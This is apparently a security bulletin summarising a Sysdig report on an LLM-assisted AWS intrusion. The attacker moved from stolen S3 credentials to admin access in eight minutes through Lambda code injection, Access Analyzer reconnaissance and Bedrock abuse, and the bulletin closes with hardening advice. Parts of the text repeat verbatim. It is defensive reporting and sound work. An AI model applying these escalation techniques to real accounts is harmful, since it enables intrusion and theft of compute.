AI-Assisted Cloud Intrusion Achieves Admin Access in 8 Minutes
Summary:
On November 28, 2025, a threat actor executed a highly automated cloud intrusion against an AWS environment, escalating from initial access to administrative privileges in less than 10 minutes. The attack utilized credentials stolen from public S3 buckets to infiltrate the victim’s infrastructure. The operation was notable for its heavy reliance on Large Language Models (LLMs), which the adversary used to automate reconnaissance, generate malicious Python code, and facilitate real-time decision-making.
The total time from credential theft to the successful execution of a malicious Lambda function was just eight minutes. The attacker explicitly queried IAM Access Analyzer findings. By reviewing "external access" and "unused access" findings generated by the victim's own security tools, the attacker was able to identify vulnerable attack paths and unused roles to target, effectively weaponizing the organization's security posture against itself. To access specific high-end AI models, the attacker programmatically interacted with AWS Marketplace APIs (SearchAgreements, AcceptAgreementRequest) to accept end-user license agreements (EULAs) on the fly, ensuring their model invocation requests would not be blocked by administrative red tape. The attacker’s ultimate goals appeared to involve resource hijacking for model training or compute resale, evidenced by "LLMjacking" (abusing Amazon Bedrock models) and the launching of high-cost GPU instances.
Security Officer Comments:
The adversary's profile suggests a likely Serbian origin, based on comments found in the injected code, and a heavy dependence on AI tools, indicated by hallucinations such as referencing non-existent account IDs and a fake GitHub repository. The technical threat vector originated from public S3 buckets containing valid IAM user credentials meant for testing.
TTPs included extensive reconnaissance across AWS services (including Bedrock, Lambda, and Secrets Manager) and privilege escalation via Lambda function code injection. Specifically, the attacker modified an existing function (EC2-init) to create new access keys for an admin user named frick. Lateral movement was aggressive, spanning 19 unique AWS principals and involving attempts to assume the OrganizationAccountAccessRole across both valid and hallucinated account numbers. The attack also featured significant data collection, including secrets, SSM parameters, and CloudTrail logs. In a demonstration of trends toward AI-assisted threats, the attacker installed a backdoor via a JupyterLab server on a p4d.24xlarge instance and utilized models like Claude 3.5 Sonnet and Titan Text G1 through the victim's Bedrock access.
Suggested Corrections:
Sysdig Recommendations
https://www.sysdig.com/blog/ai-assisted-cloud-intrusion-achieves-admin-access-in-8-minutes
On November 28, 2025, a threat actor executed a highly automated cloud intrusion against an AWS environment, escalating from initial access to administrative privileges in less than 10 minutes. The attack utilized credentials stolen from public S3 buckets to infiltrate the victim’s infrastructure. The operation was notable for its heavy reliance on Large Language Models (LLMs), which the adversary used to automate reconnaissance, generate malicious Python code, and facilitate real-time decision-making.
The total time from credential theft to the successful execution of a malicious Lambda function was just eight minutes. The attacker explicitly queried IAM Access Analyzer findings. By reviewing "external access" and "unused access" findings generated by the victim's own security tools, the attacker was able to identify vulnerable attack paths and unused roles to target, effectively weaponizing the organization's security posture against itself. To access specific high-end AI models, the attacker programmatically interacted with AWS Marketplace APIs (SearchAgreements, AcceptAgreementRequest) to accept end-user license agreements (EULAs) on the fly, ensuring their model invocation requests would not be blocked by administrative red tape. The attacker’s ultimate goals appeared to involve resource hijacking for model training or compute resale, evidenced by "LLMjacking" (abusing Amazon Bedrock models) and the launching of high-cost GPU instances.
Security Officer Comments:
The adversary's profile suggests a likely Serbian origin, based on comments found in the injected code, and a heavy dependence on AI tools, indicated by hallucinations such as referencing non-existent account IDs and a fake GitHub repository. The technical threat vector originated from public S3 buckets containing valid IAM user credentials meant for testing.
TTPs included extensive reconnaissance across AWS services (including Bedrock, Lambda, and Secrets Manager) and privilege escalation via Lambda function code injection. Specifically, the attacker modified an existing function (EC2-init) to create new access keys for an admin user named frick. Lateral movement was aggressive, spanning 19 unique AWS principals and involving attempts to assume the OrganizationAccountAccessRole across both valid and hallucinated account numbers. The attack also featured significant data collection, including secrets, SSM parameters, and CloudTrail logs. In a demonstration of trends toward AI-assisted threats, the attacker installed a backdoor via a JupyterLab server on a p4d.24xlarge instance and utilized models like Claude 3.5 Sonnet and Titan Text G1 through the victim's Bedrock access.
Suggested Corrections:
Sysdig Recommendations
- Apply the principle of least privilege to all IAM users and roles, including execution roles used by Lambda functions. An overly permissive execution role enabled the threat actor to escalate privileges in this attack.
- Restrict UpdateFunctionConfiguration and PassRolepermissions carefully. Threat actors may attempt to replace a Lambda function's execution role with a more privileged one, which requires both permissions.
- Limit UpdateFunctionCode permissions to specific functions and assign them only to principals that genuinely need code deployment capabilities.
- Enable Lambda function versioning to maintain immutable records of the code running at any point. Use function aliases to point to specific versions, requiring a threat actor to both modify code and update the alias to affect production.
- Ensure S3 buckets containing sensitive data, including RAG data and AI model artifacts, are not publicly accessible.
- Enable model invocation logging for Amazon Bedrock to detect unauthorized usage.
- Monitor for IAM Access Analyzer enumeration, as this provides threat actors with valuable reconnaissance data about your environment.
https://www.sysdig.com/blog/ai-assisted-cloud-intrusion-achieves-admin-access-in-8-minutes
| View this resource |